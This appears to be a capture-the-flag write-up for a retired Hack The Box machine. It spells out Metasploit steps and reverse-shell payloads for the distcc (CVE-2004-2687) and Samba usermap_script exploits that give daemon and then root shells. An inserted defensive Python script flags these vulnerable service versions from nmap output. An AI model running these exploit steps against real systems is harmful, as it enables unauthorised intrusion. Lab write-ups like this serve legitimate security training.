Link: https://app.hackthebox.eu/machines/1
IP: 10.129.196.171
Enumeration

Our nmap scan revealed an FTP server running vsftpd 2.3.4, a version with a known backdoor that allows command execution.
I attempted to connect to the Samba share with anonymous authentication but did not get any access.
Gaining Access
Currently, my path forward is to use one of the backdoor command execution (BCE) vulnerabilities found for vsftpd:

Next, I downloaded the code, a python3 script, and supplied the IP as the host parameter.
However, after trying this script, and then loading msfconsole and attempting the exploit from there, neither worked; this appears to be a honeypot.
Next, I performed a full port scan, which revealed a new port, 3632:

According to this guide, we can use metasploit to check if it’s vulnerable to CVE-2004-2687.
I ran the following commands and gained a reverse shell:
$ msfconsole
use exploit/unix/misc/distcc_exec
show targets
set TARGET 0
show options
set RHOSTS 10.129.196.171
show payloads
# my first choice reverse_bash did not work
set PAYLOAD payload/cmd/unix/reverse
exploit
After running whoami we can see we are the daemon account. I navigated to /home and found four directories: ftp, makis, service, user. The user.txt flag is found in makis.
Privilege Escalation
We have the user flag but we still need the root flag.
The /home/user folder has a .ssh folder in it, but its owner and group are set to 1001, a non-existent user and group, and as daemon we are unable to change the owner/group.
I checked for any suid/guid binaries but nothing stood out.
Our Linux version is Ubuntu 8.04, kernel 2.6.24-16-server. Some additional searching shows there is a privilege escalation memory corruption script for this kernel.
But this may not work in our case because I do not have a user/pass to log in with.
I checked the exact Samba version with smbstatus and found we are on v3.0.20. Using searchsploit, I found there is a usermap_script vulnerability for this version.
I fire up msfconsole again and find the matching module, exploit/multi/samba/usermap_script. I set the options and it falls back to a default payload of cmd/unix/reverse_netcat.
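The three findings on this box (vsftpd 2.3.4 on FTP, distcc on 3632/tcp, and Samba 3.0.20) are all things a defender can catch from a version scan before anyone runs an exploit module. The script below is an added example, not part of the original writeup or of any tool it mentions: it parses lines in the shape nmap -sV prints, matches the banners against a small rule list, and reports a mitigation for each hit. The rule list, the regexes and the sample scan output are constructed for illustration (the sample banners are modelled on the versions named above, not copied from the box).

```python
"""Flag legacy network services by version banner.

Added example (not from the original writeup). Input is text in the shape of
nmap -sV output; each open port's banner is checked against a rule list that
covers the three services this box exposed. Rules and sample data are
constructed assumptions for illustration.
"""
import re
from dataclasses import dataclass


@dataclass(frozen=True)
class Rule:
    name: str
    pattern: str        # regex applied to "port/proto service banner"
    mitigation: str


# Assumed rule set: each regex matches the banner nmap would print for the
# affected version. A real deployment would load this from a vulnerability feed.
RULES = [
    Rule("vsftpd 2.3.4 backdoor",
         r"\bvsftpd 2\.3\.4\b",
         "reinstall vsftpd from a trusted package; restrict or disable FTP"),
    Rule("distcc exposed (CVE-2004-2687)",
         r"^3632/tcp\b.*\bdistcc",
         "run distccd with --allow limited to build hosts, or firewall 3632/tcp"),
    Rule("Samba 3.0.20 username map script",
         r"\bSamba (?:smbd )?3\.0\.20\b",
         "upgrade Samba; remove 'username map script' from smb.conf"),
]


def parse_nmap_line(line):
    """Parse one 'PORT STATE SERVICE VERSION' line from nmap -sV output.

    Returns (port, proto, service, banner) for an open port, or None for
    header lines and ports that are not open."""
    m = re.match(r"^(\d+)/(tcp|udp)\s+(\w+)\s+(\S+)\s*(.*)$", line.strip())
    if not m:
        return None
    port, proto, state, service, banner = m.groups()
    if state != "open":
        return None
    return int(port), proto, service, banner


def find_legacy_services(nmap_output):
    """Return a list of (port, rule name, mitigation) for every open port
    whose banner matches a rule, in scan order."""
    findings = []
    for line in nmap_output.splitlines():
        parsed = parse_nmap_line(line)
        if parsed is None:
            continue
        port, proto, service, banner = parsed
        haystack = f"{port}/{proto} {service} {banner}"
        for rule in RULES:
            if re.search(rule.pattern, haystack):
                findings.append((port, rule.name, rule.mitigation))
    return findings


# Constructed sample scan output modelled on the versions this writeup found.
SAMPLE_SCAN = """\
PORT     STATE  SERVICE     VERSION
21/tcp   open   ftp         vsftpd 2.3.4
22/tcp   open   ssh         OpenSSH 4.7p1 (protocol 2.0)
139/tcp  open   netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp  open   netbios-ssn Samba smbd 3.0.20-Debian (workgroup: WORKGROUP)
3632/tcp open   distccd     distccd v1 ((GNU) 4.2.4)
8080/tcp closed http-proxy
"""

if __name__ == "__main__":
    for port, name, fix in find_legacy_services(SAMPLE_SCAN):
        print(f"{port}/tcp: {name} -> {fix}")
```

Run as written it reports ports 21, 445 and 3632 and skips the closed port, the header line and the generic "3.X - 4.X" Samba banner on 139; feeding it real `nmap -sV` output works the same way, since only the port/state/service/version columns are read.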
Once we gain a shell, a whoami tells us we are root! Now we can snag the /root/root.txt flag.
Conclusion
This was pretty fun. The vsftpd server seemed to be a honeypot; the exploit I found for that version did not work. It required me to do more enumeration, where I found distcc, also vulnerable. This gave us access to the user.txt flag as daemon, but I could not find a way to privesc directly from that shell. I did more enumeration to figure out the exact Samba version, found it was vulnerable, and that gave us root to grab the last flag. It was great for making you stay on your toes and keep finding new paths!